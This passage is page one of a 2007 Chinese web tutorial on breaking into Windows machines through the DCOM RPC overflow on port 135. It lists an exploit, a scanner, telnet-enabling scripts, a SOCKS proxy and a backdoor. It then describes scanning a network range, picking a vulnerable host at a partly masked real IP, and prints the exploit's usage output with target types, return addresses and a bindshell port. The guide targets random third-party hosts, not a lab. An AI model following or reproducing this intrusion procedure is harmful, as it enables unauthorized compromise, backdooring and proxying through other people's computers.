WEB开发网
开发学院网络安全黑客技术 一步一个脚印,学好入侵 阅读

一步一个脚印,学好入侵

 2007-07-26 16:45:22 来源:WEB开发网   
核心提示:大家好,现在网上很流行dcomrpc,一步一个脚印,学好入侵,那好就说说利用dcomrpc入侵,很入侵之后做的事情,查找有rpc漏洞的机子,这个漏洞需要135端口开放,需要的工具:很好的: radmin.exe扫描工具: retinarpcdcom.exe溢出攻击工具:RpcDcom(通用溢出工具)脚本开启telnet

大家好,现在网上很流行dcomrpc,那好就说说利用dcomrpc入侵。很入侵之后做的事情。

需要的工具: 

很好的: radmin.exe 

扫描工具: retinarpcdcom.exe 

溢出攻击工具:RpcDcom(通用溢出工具) 

脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe 

代理:sksockserver.exe 

后门程序:WinEggDropShellPro3thVersion 

好了,该做的都做的差不多了。

首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必 

随便扫一下就会发现有许多主机开放的135端口) 

211.217.50.xx 第一个主机就被扫出来又此漏洞。 

看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下

其他的缺陷主机开了3389端口我们可以上去看一下是xp版本还是win2k是win2k server版本展开命令行: 

[查看dcomrpc的用法 用法 dcomrpc -d <host> [options] ] 

F:/hack>cd rpc/dcomrpc 

RPC DCOM Expl01t coded by .:[oc192.us]:. Security 

Complied and Modified by Expl01t www.longker.com 

Usage: 

dcomrpc -d <host> [options] 

Options: 

-d: Hostname to attack [Required] 

-t: Type [Default: 0] 

-r: Return address [Default: Selected from target] 

-p: Attack port [Default: 135] 

-l: Bindshell port [Default: 666] 

Types: 

0 [0x0018759f]: [Win2k-Universal] 

1 [0x0100139d]: [WinXP-Universal] 

开始进行溢出: 

1 2 3  下一页

Tags:一步一个脚印 学好 入侵

编辑录入:爽爽 [复制链接] [打 印]
赞助商链接